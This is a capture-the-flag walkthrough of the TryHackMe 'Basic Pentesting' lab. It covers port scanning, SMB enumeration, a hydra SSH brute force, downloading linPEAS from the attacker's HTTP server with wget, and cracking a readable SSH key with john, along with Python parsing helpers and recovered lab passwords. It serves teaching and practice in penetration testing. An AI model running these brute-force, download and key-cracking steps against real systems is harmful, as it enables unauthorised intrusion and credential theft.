CTF - TryHackMe: Basic Pentesting
Level: Easy
Introduction
Web App Testing and Privilege Escalation.
Table of Contents
Reconnaissance
PREPARATION
# Make directory to work
<strong>mkdir Basic-Pentesting
cd Basic-Pentesting
mkdir scans</strong>
Rustscan
# -oA takes a file basename, not a directory: "scans/" alone would write scans/.nmap, scans/.gnmap and scans/.xml
# --script vuln includes intrusive checks (the smb-vuln-* DoS scripts try to crash a vulnerable service); fine on a lab box, not on production
<strong>sudo rustscan -a 10.10.17.75 --ulimit 5000 -- -oA scans/basic -sC -sV --script vuln</strong>
<strong>Open 10.10.17.75:22
Open 10.10.17.75:80
Open 10.10.17.75:139
Open 10.10.17.75:445
Open 10.10.17.75:8009
Open 10.10.17.75:8080</strong>
PORT STATE SERVICE REASON VERSION
<strong>22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)</strong>
<strong>80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))</strong>
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
|_ /development/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
<strong>139/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)</strong>
<strong>445/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)</strong>
<strong>8009/tcp open ajp13 syn-ack ttl 63 Apache Jserv (Protocol v1.3)</strong>
<strong>8080/tcp open http syn-ack ttl 63 Apache Tomcat 9.0.7</strong>
| http-enum:
| /examples/: Sample scripts
| /manager/html/upload: Apache Tomcat (401 )
| /manager/html: Apache Tomcat (401 )
|_ /docs/: Potentially interesting folder
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
<strong>| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service</strong>
| <strong>State: VULNERABLE</strong>
| <strong>The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.</strong>
Note: treat this as a false positive. The script checks for a Windows 2000 regsvc crash, while the target is Samba on Ubuntu (the IPC$ share comment in the enum4linux output below names Samba 4.3.11-Ubuntu); the smb-vuln-* scripts regularly misfire against Samba. It is also a reminder that these DoS checks will attempt to crash a vulnerable service, so keep them out of scans against systems you care about.
Port      | Description
----------|---------------------------------------------------------------
22        | SSH (OpenSSH 7.2p2 Ubuntu 4ubuntu2.4)
80        | Web server (Apache httpd 2.4.18), /development/ has directory listing
139 / 445 | Samba smbd 3.X - 4.X, workgroup WORKGROUP
8009      | Apache JServ Protocol (AJP) v1.3, the Tomcat connector
8080      | Apache Tomcat 9.0.7 (/manager and /host-manager answer 401)
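Keeping the scan output in scans/ pays off when you parse it instead of copying the table by hand. The following is an added example, not part of the original write-up, that parses nmap's grepable output (the .gnmap file that -oA writes next to the .nmap and .xml) into the table above. The SAMPLE_GNMAP text is constructed from the scan results shown on this page; the per-port field layout (port/state/proto/owner/service/rpcinfo/version) is nmap's own.

```python
"""Parse nmap grepable output (.gnmap from -oA, or -oG) into a port table.

Added example, not from the original write-up. SAMPLE_GNMAP is constructed from the
scan results shown on the page; the field layout is nmap's grepable format.
"""

# Constructed: roughly what -oA scans/basic would have left in scans/basic.gnmap.
# Fields on a Host: line are tab-separated; port entries are comma-space separated.
SAMPLE_GNMAP = """# Nmap 7.93 scan initiated as: nmap -oA scans/basic -sC -sV 10.10.17.75
Host: 10.10.17.75 ()\tStatus: Up
Host: 10.10.17.75 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.18 ((Ubuntu))/, 139/open/tcp//netbios-ssn//Samba smbd 3.X - 4.X (workgroup: WORKGROUP)/, 445/open/tcp//netbios-ssn//Samba smbd 3.X - 4.X (workgroup: WORKGROUP)/, 8009/open/tcp//ajp13//Apache Jserv (Protocol v1.3)/, 8080/open/tcp//http//Apache Tomcat 9.0.7/\tIgnored State: closed (994)
# Nmap done -- 1 IP address (1 host up) scanned
"""

FIELDS = ("port", "state", "proto", "owner", "service", "rpcinfo", "version")


def parse_gnmap(text):
    """Return one dict per port entry, across every host in the file."""
    rows = []
    for line in text.splitlines():
        if not line.startswith("Host:") or "\tPorts: " not in line:
            continue
        host = line.split()[1]
        # Everything between "Ports: " and the next tab-separated field (e.g. "Ignored State").
        ports_field = line.split("\tPorts: ", 1)[1].split("\t", 1)[0]
        for entry in ports_field.split(", "):
            # Each entry ends with a trailing "/", drop exactly that one; then split at most
            # six times so a "/" inside the version string (the last field) survives.
            entry = entry[:-1] if entry.endswith("/") else entry
            parts = entry.split("/", 6)
            if len(parts) != 7:
                raise ValueError(f"unexpected port entry: {entry!r}")
            row = dict(zip(FIELDS, parts))
            row["host"] = host
            row["port"] = int(row["port"])
            rows.append(row)
    return rows


def open_ports(rows, host=None):
    """Filter to open ports, optionally for a single host."""
    return [r for r in rows if r["state"] == "open" and (host is None or r["host"] == host)]


def render_table(rows):
    """Plain-text table in the same shape as the one in the write-up."""
    lines = ["Port  | Service      | Version"]
    for r in rows:
        lines.append(f"{r['port']:<5} | {r['service']:<12} | {r['version']}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(render_table(open_ports(parse_gnmap(SAMPLE_GNMAP))))
```

Point it at scans/basic.gnmap from a real run and the same function gives you every host's open ports, which is handier than the .nmap text when the scope is more than one box.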
What do we have
NIKTO
<strong>nikto -h 10.10.17.75</strong>
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.10.17.75
+ Target Hostname: 10.10.17.75
+ Target Port: 80
+ Start Time: 2023-05-28 23:46:18 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 9e, size: 56a870fbc8f28, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
<strong>+ OPTIONS: Allowed HTTP Methods: POST, OPTIONS, GET, HEAD .
+ /development/: Directory indexing found.
+ /development/: This might be interesting.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/</strong>
+ 8074 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time: 2023-05-28 23:51:42 (GMT2) (324 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
DIRB
<strong>dirb http://10.10.17.75/</strong>
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun May 28 23:47:37 2023
URL_BASE: http://10.10.17.75/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.17.75/ ----
==> DIRECTORY: <strong>http://10.10.17.75/development/</strong>
<strong>+ http://10.10.17.75/index.html (CODE:200|SIZE:158)
+ http://10.10.17.75/server-status (CODE:403|SIZE:299)</strong>
---- Entering directory: http://10.10.17.75/development/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sun May 28 23:50:35 2023
DOWNLOADED: 4612 - FOUND: 2
<strong>dirb http://10.10.17.75:8080/</strong>
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon May 29 00:08:01 2023
URL_BASE: http://10.10.17.75:8080/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
<strong>---- Scanning URL: http://10.10.17.75:8080/ ----
+ http://10.10.17.75:8080/docs (CODE:302|SIZE:0)
+ http://10.10.17.75:8080/examples (CODE:302|SIZE:0)
+ http://10.10.17.75:8080/favicon.ico (CODE:200|SIZE:21630)
+ http://10.10.17.75:8080/host-manager (CODE:302|SIZE:0)
+ http://10.10.17.75:8080/manager (CODE:302|SIZE:0) </strong>
-----------------
END_TIME: Mon May 29 00:10:56 2023
DOWNLOADED: 4612 - FOUND: 5
BURP SUITE
# Let's fire up Burp Suite and check <strong>http://10.10.17.75:80</strong>
Undergoing maintenance
Please check back later
# <strong>http://10.10.17.75/development/</strong>
[PARENTDIR] Parent Directory -
<strong>[TXT] dev.txt 2018-04-23 14:52 483
[TXT] j.txt 2018-04-23 13:10 235 </strong>
# <strong>http://10.10.17.75:8080/</strong>
Apache Tomcat v9.0.7 Webserver
# <strong>http://10.10.17.75:8080/manager/status</strong>
Login Page
dev.txt
2018-04-23: I've been messing with that <strong>struts</strong> stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the <strong>REST version of the example!</strong>). Oh, and right now I'm
using <strong>version 2.5.12</strong>, because other versions were giving me trouble. -K
2018-04-22: <strong>SMB</strong> has been configured. -K
2018-04-21: I got <strong>Apache</strong> set up. Will put in our content later. -J
j.txt
For J:
I've been auditing the contents of <strong>/etc/shadow</strong> to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? <strong>Change that password ASAP</strong>.
-K
Takeaways: the notes are signed K and J, which line up with the kay and jan accounts found later over SMB. The Struts 2.5.12 REST example mentioned in dev.txt would be a real target (that version falls in the range hit by S2-052, CVE-2017-9805), but nothing on port 8080 beyond Tomcat's own docs, examples and manager pages shows a deployed Struts app, so that lead goes no further here. j.txt is the actionable hint: J's password was cracked from /etc/shadow, so a dictionary attack against J's account is the obvious next step.
ENUM4LINUX
<strong>enum4linux 10.10.17.75</strong>
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon May 29 00:08:48 2023
=========================================( Target Information )=========================================
Target ........... 10.10.17.75
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on 10.10.17.75 )============================
[+] Got domain/workgroup name: WORKGROUP
================================( Nbtstat Information for 10.10.17.75 )================================
Looking up status of 10.10.17.75
BASIC2 <00> - B <ACTIVE> Workstation Service
BASIC2 <03> - B <ACTIVE> Messenger Service
BASIC2 <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
====================================( Session Check on 10.10.17.75 )====================================
[+] Server 10.10.17.75 allows sessions using username '', password ''
=================================( Getting domain SID for 10.10.17.75 )=================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
==================================( Share Enumeration on 10.10.17.75 )==================================
<strong>Sharename Type Comment
--------- ---- -------
Anonymous Disk
IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu)</strong>
SMB1 disabled -- no workgroup available
<strong>[+] Attempting to map shares on 10.10.17.75 </strong>
<strong>//10.10.17.75/Anonymous Mapping: OK Listing: OK Writing: N/A</strong>
[E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//10.10.17.75/IPC$ Mapping: N/A Listing: N/A Writing: N/A
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
<strong>S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)</strong>
[+] Enumerating users using SID S-1-5-21-2853212168-2008227510-3551253869 and logon username '', password ''
S-1-5-21-2853212168-2008227510-3551253869-501 BASIC2\nobody (Local User)
S-1-5-21-2853212168-2008227510-3551253869-513 BASIC2\None (Domain Group)
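Three facts in that enum4linux output drive the rest of the engagement: the null session succeeded, the Anonymous share maps and lists without credentials, and the S-1-22-1 (Unix Users) SID range leaks the two local account names. As an added example, not from the original write-up, the Python below pulls those facts out of enum4linux text so they can feed smbclient and a hydra -L user list; the regexes follow the v0.9.1 layout shown above, and SAMPLE is constructed from that output.

```python
"""Extract actionable facts from enum4linux output: null-session status, anonymously
mappable shares, and local Unix users (by uid) for a hydra -L list.

Added example, not from the write-up. SAMPLE is constructed from the enum4linux
v0.9.1 output shown on the page; the regexes are written against that layout.
"""
import re

SAMPLE = r"""[+] Server 10.10.17.75 allows sessions using username '', password ''
    Sharename       Type      Comment
    ---------       ----      -------
    Anonymous       Disk
    IPC$            IPC       IPC Service (Samba Server 4.3.11-Ubuntu)
[+] Attempting to map shares on 10.10.17.75
//10.10.17.75/Anonymous    Mapping: OK Listing: OK Writing: N/A
//10.10.17.75/IPC$    Mapping: N/A Listing: N/A Writing: N/A
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
[+] Enumerating users using SID S-1-5-21-2853212168-2008227510-3551253869 and logon username '', password ''
S-1-5-21-2853212168-2008227510-3551253869-501 BASIC2\nobody (Local User)
"""

NULL_SESSION_RE = re.compile(
    r"^\[\+\] Server (\S+) allows sessions using username '', password ''", re.M)
# S-1-22-1 is Samba's "Unix Users" authority; the RID is the account's uid.
UNIX_USER_RE = re.compile(r"^S-1-22-1-(\d+)\s+Unix User\\(\S+)\s+\(Local User\)", re.M)
SHARE_MAP_RE = re.compile(
    r"^//(\S+?)/(\S+)\s+Mapping:\s*(\S+)\s+Listing:\s*(\S+)\s+Writing:\s*(\S+)", re.M)


def null_session_allowed(text):
    """True when enum4linux reports an empty-username, empty-password session succeeded."""
    return NULL_SESSION_RE.search(text) is not None


def unix_users(text):
    """uid -> username for every Unix User line."""
    return {int(rid): name for rid, name in UNIX_USER_RE.findall(text)}


def anonymous_shares(text):
    """UNC paths whose mapping and listing both succeeded without credentials."""
    return [f"//{host}/{share}" for host, share, mapping, listing, _writing
            in SHARE_MAP_RE.findall(text) if mapping == "OK" and listing == "OK"]


def hydra_user_list(text):
    """Usernames ordered by uid, one per line for hydra -L; the lowest uid is the
    first account created on the box, which is usually the one with sudo."""
    users = unix_users(text)
    return [users[uid] for uid in sorted(users)]


if __name__ == "__main__":
    print("null session:", null_session_allowed(SAMPLE))
    print("anonymous shares:", anonymous_shares(SAMPLE))
    print("\n".join(hydra_user_list(SAMPLE)))
```

Redirect the last print into users.txt and hydra -L users.txt replaces the single -l jan below; in this room jan is the right pick anyway, because j.txt already told us whose password was weak.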
SMB / WITH SMBCLIENT
<strong>smbclient -U Anonymous //10.10.17.75/Anonymous</strong>
Password for [WORKGROUP\Anonymous]:   (leave empty and press Enter; enum4linux already showed the share maps with a null session, and -N would skip the prompt entirely)
<strong>dir</strong>
. D 0 Thu Apr 19 19:31:20 2018
.. D 0 Thu Apr 19 19:13:06 2018
<strong>staff.txt </strong> N 173 Thu Apr 19 19:29:55 2018
<strong>get staff.txt</strong>
getting file \staff.txt of size 173 as staff.txt (1.1 KiloBytes/sec) (average 1.1 KiloBytes/sec)
Staff.txt
Announcement to staff:
PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, <strong>Jan!</strong>)
<strong>-Kay</strong>
Exploitation
HYDRA - Brute Force SSH
<strong>hydra -l jan -P /usr/share/wordlists/rockyou.txt -t 10 -v -f -e nsr -o ssh-cred-output.txt ssh://10.10.17.75</strong>
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-05-29 00:47:36
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 14344402 login tries (l:1/p:14344402), ~1434441 tries per task
[DATA] attacking ssh://10.10.17.75:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://jan@10.10.17.75:22
[<strong>INFO] Successful, password authentication is supported by ssh://10.10.17.75:22</strong>
[STATUS] 110.00 tries/min, 110 tries in 00:01h, 14344292 to do in 2173:23h, 10 active
[STATUS] 85.67 tries/min, 257 tries in 00:03h, 14344145 to do in 2790:42h, 10 active
[STATUS] 72.86 tries/min, 510 tries in 00:07h, 14343892 to do in 3281:17h, 10 active
<strong>[22][ssh] host: 10.10.17.75 login: jan password: armando</strong>
[STATUS] attack finished for 10.10.17.75 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-05-29 00:58:18
SSH LOGIN WITH jan
<strong>ssh jan@10.10.17.75</strong>
The authenticity of host '10.10.17.75 (10.10.17.75)' can't be established.
ED25519 key fingerprint is SHA256:XKjDkLKocbzjCch0Tpriw1PeLPuzDufTGZa4xMDA+o4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? <strong>yes</strong>
Warning: Permanently added '10.10.17.75' (ED25519) to the list of known hosts.
jan@10.10.17.75's password: <strong>armando</strong>
Privilege Escalation
LINPEAS
# Work from a world-writable directory on the target
<strong>cd /tmp</strong>
# On the attacker machine (10.11.8.178), serve the directory that holds linpeas.sh over HTTP (port 8000 needs no root)
<strong>python3 -m http.server 8000</strong>
# On the target, download linpeas.sh
<strong>wget http://10.11.8.178:8000/linpeas.sh</strong>
# Make it executable
<strong>chmod +x linpeas.sh</strong>
# Run it (only the relevant findings are excerpted below)
<strong>./linpeas.sh</strong>
╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash
╔══════════╣ Users with console
<strong>jan:x:1001:1001::/home/jan:/bin/bash
kay:x:1000:1000:Kay,,,:/home/kay:/bin/bash</strong>
root:x:0:0:root:/root:/bin/bash
══════════╣ Searching ssl/ssh files
╔══════════╣ Analyzing SSH Files (limit 70)
<strong>-rw-r--r-- 1 kay kay 3326 Apr 19 2018 /home/kay/.ssh/id_rsa</strong>
<strong>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75
[...]
-----END RSA PRIVATE KEY-----</strong>
-rw-r--r-- 1 kay kay 771 Apr 19 2018 /home/kay/.ssh/id_rsa.pub
ssh-rsa [...] I don't have to type a long password anymore!
-rw-rw-r-- 1 kay kay 771 Apr 23 2018 /home/kay/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCzAsDwjb0ft4IO7Kyux8DWocNiS1aJqpdVEo+gfk8Ng624b9qOQp7LOWDMVIINfCuzkTA3ZugSyo1OehPc0iyD7SfJIMzsETFvlHB3DlLLeNFm11hNeUBCF4Lt6o9uH3lcTuPVyZAvbAt7xD66bKjyEUy3hrpSnruN+M0exdSjaV54PI9TBFkUmmqpXsrWzMj1QaxBxZMq3xaBxTsFvW2nEx0rPOrnltQM4bdAvmvSXtuxLw6e5iCaAy1eoTHw0N6IfeGvwcHXIlCT25gH1gRfS0/NdR9cs78ylxYTLDnNvkxL1J3cVzVHJ/ZfOOWOCK4iJ/K8PIbSnYsBkSnrIlDX27PM7DZCBu+xhIwV5z4hRwwZZG5VcU+nDZZYr4xtpPbQcIQWYjVwr5vF3vehk57ymIWLwNqU/rSnZ0wZH8MURhVFaNOdr/0184Z1dJZ34u3NbIBxEV9XsjAh/L52Dt7DNHWqUJKIL1/NV96LKDqHKCXCRFBOh9BgqJUIAXoDdWLtBunFKu/tgCz0n7SIPSZDxJDhF4StAhFbGCHP9NIMvB890FjJE/vys/PuY3efX1GjTdAijRa019M2f8d0OnJpktNwCIMxEjvKyGQKGPLtTS8o0UAgLfV50Zuhg7H5j6RAJoSgFOtlosnFzwNuxxU05ozHuJ59wsmn5LMK97sbow== I don't have to type a long password anymore!
Port 22
PermitRootLogin prohibit-password
PubkeyAuthentication yes
PermitEmptyPasswords no
ChallengeResponseAuthentication no
UsePAM yes
<strong>══╣ Possible private SSH keys were found!
/home/kay/.ssh/id_rsa</strong>
The real weakness is the permission bits: /home/kay/.ssh/id_rsa is -rw-r--r--, so any local user (here jan) can read kay's private key, and the matching public key sits in kay's authorized_keys, so the key grants a login as kay. The passphrase on the key is the only thing left in the way.
Credential Access
COPY PRIVATE SSH KEY
# Copy the key out of the linPEAS output (or cat /home/kay/.ssh/id_rsa as jan) into a local file named kay-ssh, then set the permissions ssh insists on for a private key
<strong>chmod 600 kay-ssh</strong>
# But the key is encrypted: the legacy PEM header names the cipher and IV, and ssh will prompt for the passphrase
-----BEGIN RSA PRIVATE KEY-----
<strong>Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75</strong>
CRACK THE KEY WITH JOHN THE RIPPER
<strong>ssh2john kay-ssh > kay-ssh.hash</strong>
# Crack the SSH Key
<strong>john --wordlist=/usr/share/wordlists/rockyou.txt kay-ssh.hash</strong>
Created directory: /home/anyguy/.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 20 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
<strong>beeswax (kay-ssh) </strong>
1g 0:00:00:00 DONE (2023-05-29 01:20) 4.166g/s 345333p/s 345333c/s 345333C/s behlat..amaretto
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
# Show the password
<strong>john --show kay-ssh.hash </strong>
kay-ssh:beeswax
1 password hash cracked, 0 left
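John cracked this in well under a second because the key is in the legacy PEM container: the Proc-Type/DEK-Info header means OpenSSL derived the AES-128 key with a single MD5 pass over the passphrase, which is exactly what john's "Cost 1 ... is 0" (MD5/AES) and "iteration count is 1" lines say. Keys written by current ssh-keygen use the openssh-key-v1 container with a bcrypt KDF, where every guess costs the configured number of bcrypt rounds and the rate drops by orders of magnitude. The following is an added example, not from the write-up, that reads either container and reports the KDF so you know what to expect before running ssh2john; SAMPLE_LEGACY reuses the header shown above with a dummy body, and SAMPLE_OPENSSH is a constructed envelope carrying only the cipher/KDF preamble (no real key material).

```python
"""Classify an SSH private key's protection before spending crack time on it.

Added example, not from the write-up. SAMPLE_LEGACY reuses the DEK-Info header shown
on the page with a dummy body; SAMPLE_OPENSSH is a constructed openssh-key-v1 preamble
(cipher, KDF, KDF options, key count) with no key material behind it.
"""
import base64
import re
import struct

SAMPLE_LEGACY = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75

QUJDREVGR0hJSktMTU5PUA==
-----END RSA PRIVATE KEY-----
"""


def _ssh_string(b):
    """SSH wire 'string': 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(b)) + b


def _read_string(buf, off):
    (n,) = struct.unpack_from(">I", buf, off)
    off += 4
    return buf[off:off + n], off + n


# Constructed preamble: aes256-ctr, bcrypt KDF with a 16-byte zero salt and 16 rounds, 1 key.
_OPENSSH_BLOB = (b"openssh-key-v1\x00"
                 + _ssh_string(b"aes256-ctr")
                 + _ssh_string(b"bcrypt")
                 + _ssh_string(_ssh_string(b"\x00" * 16) + struct.pack(">I", 16))
                 + struct.pack(">I", 1))
SAMPLE_OPENSSH = ("-----BEGIN OPENSSH PRIVATE KEY-----\n"
                  + base64.b64encode(_OPENSSH_BLOB).decode()
                  + "\n-----END OPENSSH PRIVATE KEY-----\n")


def classify_ssh_key(text):
    """Return (container, cipher, kdf, rounds); rounds is None unless the KDF is bcrypt."""
    lines = [l.strip() for l in text.strip().splitlines()]
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(l for l in lines[1:] if not l.startswith("-----")))
        magic = b"openssh-key-v1\x00"
        if not blob.startswith(magic):
            raise ValueError("not an openssh-key-v1 blob")
        cipher, off = _read_string(blob, len(magic))
        kdf, off = _read_string(blob, off)
        kdfopts, off = _read_string(blob, off)
        rounds = None
        if kdf == b"bcrypt":
            # kdfoptions for bcrypt = string salt || uint32 rounds
            _salt, o = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack_from(">I", kdfopts, o)
        return ("openssh-v1", cipher.decode(), kdf.decode(), rounds)
    m = re.search(r"^DEK-Info:\s*([A-Za-z0-9-]+),([0-9A-Fa-f]+)$", text, re.M)
    if "Proc-Type: 4,ENCRYPTED" in text and m:
        # Legacy PEM: OpenSSL EVP_BytesToKey, one MD5 digest over passphrase+IV, no stretching.
        return ("pem-legacy", m.group(1), "md5-evp", None)
    return ("pem-legacy", "none", "none", None)


def crack_effort(info):
    """Triage label matching what john's Cost lines will report for this key."""
    _container, cipher, kdf, _rounds = info
    if cipher == "none" or kdf == "none":
        return "unencrypted"
    if kdf == "md5-evp":
        return "fast"   # john cost 0 / iteration 1: hundreds of thousands of candidates per second
    return "slow"       # bcrypt_pbkdf with `rounds` iterations: a few hundred per second at best


if __name__ == "__main__":
    for name, key in (("legacy", SAMPLE_LEGACY), ("openssh-v1", SAMPLE_OPENSSH)):
        info = classify_ssh_key(key)
        print(name, info, crack_effort(info))
```

Run it on the copied kay-ssh file and it reports the same legacy/MD5 combination the john output above shows; on a key from a current ssh-keygen you would see bcrypt with 16 rounds and should plan for a far smaller wordlist or a rule-based attack instead of all of rockyou.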
LOGIN WITH PRIVATE KEY SSH
<strong>ssh -i kay-ssh kay@10.10.17.75</strong>
Enter passphrase for key 'kay-ssh': <strong>beeswax</strong>
Collection
# In kay's home directory
<strong>ls -la</strong>
total 48
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 kay kay 756 Apr 23 2018 .bash_history
-rw-r--r-- 1 kay kay 220 Apr 17 2018 .bash_logout
-rw-r--r-- 1 kay kay 3771 Apr 17 2018 .bashrc
drwx------ 2 kay kay 4096 Apr 17 2018 .cache
-rw------- 1 root kay 119 Apr 23 2018 .lesshst
drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano
<strong>-rw------- 1 kay kay 57 Apr 23 2018 pass.bak</strong>
-rw-r--r-- 1 kay kay 655 Apr 17 2018 .profile
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh
-rw-r--r-- 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful
-rw------- 1 root kay 538 Apr 23 2018 .viminfo
<strong>cat pass.bak</strong>
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
pass.bak is a plaintext password backup, readable only because we now are kay (the file is mode 600). The .sudo_as_admin_successful marker in the listing is written by Ubuntu's sudo the first time a member of the admin/sudo group runs sudo successfully, so the next check is sudo -l with this password to see what kay may run as root.